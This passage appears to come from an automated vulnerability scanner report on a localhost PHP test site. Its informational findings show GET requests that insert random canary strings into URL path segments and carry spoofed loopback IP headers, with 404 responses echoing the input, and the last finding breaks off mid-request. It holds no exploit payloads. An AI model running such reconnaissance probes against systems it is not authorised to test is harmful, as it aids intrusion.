GET /examplewebistevexrufuyh9/examplewebiste/includes/DBMS/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:46 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebistevexrufuyh9/examplewebiste/includes/DBMS/ was not found on this server.</p>
...[SNIP]...
19.73. http://localhost/examplewebiste/examplewebiste/includes/DBMS/ [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/DBMS/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebistea4egtcc9zy/includes/DBMS/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:58 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebistea4egtcc9zy/includes/DBMS/ was not found on this server.</p>
...[SNIP]...
19.74. http://localhost/examplewebiste/examplewebiste/includes/DBMS/ [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/DBMS/

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/includes26irb8uaj7/DBMS/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:08 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/includes26irb8uaj7/DBMS/ was not found on this server.</p>
...[SNIP]...
19.75. http://localhost/examplewebiste/examplewebiste/includes/DBMS/ [URL path folder 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/DBMS/

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/includes/DBMSr7cdj7wmwg/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:19 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/includes/DBMSr7cdj7wmwg/ was not found on this server.</p>
...[SNIP]...
19.76. http://localhost/examplewebiste/examplewebiste/includes/DBMS/mysql [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/DBMS/mysql

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/includes/DBMS/mysql7id9ipus47 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:06:57 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/includes/DBMS/mysql7id9ipus47 was not found on this server.</p>
...[SNIP]...
19.77. http://localhost/examplewebiste/examplewebiste/includes/DBMS/mysql [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/DBMS/mysql

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebiste3wga3hjnls/examplewebiste/includes/DBMS/mysql HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:55 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste3wga3hjnls/examplewebiste/includes/DBMS/mysql was not found on this server.</p>
...[SNIP]...
19.78. http://localhost/examplewebiste/examplewebiste/includes/DBMS/mysql [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/DBMS/mysql

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste5d93g9t9uh/includes/DBMS/mysql HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:05:23 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste5d93g9t9uh/includes/DBMS/mysql was not found on this server.</p>
...[SNIP]...
19.79. http://localhost/examplewebiste/examplewebiste/includes/DBMS/mysql [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/DBMS/mysql

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/includes3j1dsp87ir/DBMS/mysql HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:05:47 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/includes3j1dsp87ir/DBMS/mysql was not found on this server.</p>
...[SNIP]...
19.80. http://localhost/examplewebiste/examplewebiste/includes/DBMS/mysql [URL path folder 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/DBMS/mysql

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/includes/DBMSayef1lzbpr/mysql HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:06:27 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/includes/DBMSayef1lzbpr/mysql was not found on this server.</p>
...[SNIP]...
19.81. http://localhost/examplewebiste/examplewebiste/includes/DBMS/pgsql [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/DBMS/pgsql

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/includes/DBMS/pgsql5345g6jku0 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:06:58 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/includes/DBMS/pgsql5345g6jku0 was not found on this server.</p>
...[SNIP]...
19.82. http://localhost/examplewebiste/examplewebiste/includes/DBMS/pgsql [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/DBMS/pgsql

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebisteeb81apeb1k/examplewebiste/includes/DBMS/pgsql HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:56 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebisteeb81apeb1k/examplewebiste/includes/DBMS/pgsql was not found on this server.</p>
...[SNIP]...
19.83. http://localhost/examplewebiste/examplewebiste/includes/DBMS/pgsql [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/DBMS/pgsql

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste2n39v2s7kw/includes/DBMS/pgsql HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:05:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste2n39v2s7kw/includes/DBMS/pgsql was not found on this server.</p>
...[SNIP]...
19.84. http://localhost/examplewebiste/examplewebiste/includes/DBMS/pgsql [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/DBMS/pgsql

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/includest6445nrk1g/DBMS/pgsql HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:05:48 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/includest6445nrk1g/DBMS/pgsql was not found on this server.</p>
...[SNIP]...
19.85. http://localhost/examplewebiste/examplewebiste/includes/DBMS/pgsql [URL path folder 4]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/DBMS/pgsql

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/includes/DBMSurrebe935j/pgsql HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:06:29 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 322
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/includes/DBMSurrebe935j/pgsql was not found on this server.</p>
...[SNIP]...
19.86. http://localhost/examplewebiste/examplewebiste/includes/dbms [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/dbms

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/includes/dbmsmm2d7doycf HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:31 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 316
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/includes/dbmsmm2d7doycf was not found on this server.</p>
...[SNIP]...
19.87. http://localhost/examplewebiste/examplewebiste/includes/dbms [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/dbms

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebistexv0w27f2a9/examplewebiste/includes/dbms HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:00 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 316
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebistexv0w27f2a9/examplewebiste/includes/dbms was not found on this server.</p>
...[SNIP]...
19.88. http://localhost/examplewebiste/examplewebiste/includes/dbms [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/dbms

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebisteedgcecowv0/includes/dbms HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:10 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 316
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebisteedgcecowv0/includes/dbms was not found on this server.</p>
...[SNIP]...
19.89. http://localhost/examplewebiste/examplewebiste/includes/dbms [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/dbms

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/includes49nsgpwt1u/dbms HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:21 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 316
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/includes49nsgpwt1u/dbms was not found on this server.</p>
...[SNIP]...
19.90. http://localhost/examplewebiste/examplewebiste/includes/examplewebistepage.inc [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/examplewebistepage.inc

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/includes/examplewebistepage.incm6j1qgemea HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:22 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 324
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/includes/examplewebistepage.incm6j1qgemea was not found on this server.</p>
...[SNIP]...
19.91. http://localhost/examplewebiste/examplewebiste/includes/examplewebistepage.inc [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/examplewebistepage.inc

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebiste34q51ys203/examplewebiste/includes/examplewebistepage.inc HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:03:53 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 324
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste34q51ys203/examplewebiste/includes/examplewebistepage.inc was not found on this server.</p>
...[SNIP]...
19.92. http://localhost/examplewebiste/examplewebiste/includes/examplewebistepage.inc [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/examplewebistepage.inc

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebisterkgx8lpjvr/includes/examplewebistepage.inc HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:01 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 324
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebisterkgx8lpjvr/includes/examplewebistepage.inc was not found on this server.</p>
...[SNIP]...
19.93. http://localhost/examplewebiste/examplewebiste/includes/examplewebistepage.inc [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/includes/examplewebistepage.inc

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/includes8rocrjx66t/examplewebistepage.inc HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:13 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 324
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/includes8rocrjx66t/examplewebistepage.inc was not found on this server.</p>
...[SNIP]...
19.94. http://localhost/examplewebiste/examplewebiste/js [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /examplewebiste/examplewebiste/jseyertcrp2a HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:32 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 305
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/examplewebiste/jseyertcrp2a was not found on this server.</p>
...[SNIP]...
19.95. http://localhost/examplewebiste/examplewebiste/js [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /examplewebistebd3dvn979y/examplewebiste/js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:04:11 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 305
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebistebd3dvn979y/examplewebiste/js was not found on this server.</p>
...[SNIP]...
19.96. http://localhost/examplewebiste/examplewebiste/js [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/examplewebiste/js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/examplewebistekypugdioxu/js HTTP/1.1
Host: localhost
